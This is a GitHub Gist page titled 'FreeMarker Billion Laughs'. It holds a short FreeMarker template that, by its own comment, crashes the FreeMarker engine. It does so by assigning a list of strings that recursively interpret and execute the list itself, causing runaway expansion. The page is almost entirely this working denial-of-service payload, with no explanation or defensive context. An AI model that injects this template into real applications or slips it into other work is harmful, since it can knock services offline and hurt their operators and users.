Last active
November 20, 2019 20:37
-
-
Save Plazmaz/6a3adaac8b1bd83ad756b77e3c620676 to your computer and use it in GitHub Desktop.
FreeMarker Billion Laughs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<#-- This will crash Freemarker when used as a template --> | |
<#assign x=[r"<#list x as y> <#assign x2=y?interpret/> <@x2/> </#list>", r"<#list x as y> <#assign x2=y?interpret/> <@x2/> </#list>"]/> | |
<#list x as y> | |
<#assign x2=y?interpret/> | |
<@x2/> | |
</#list> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment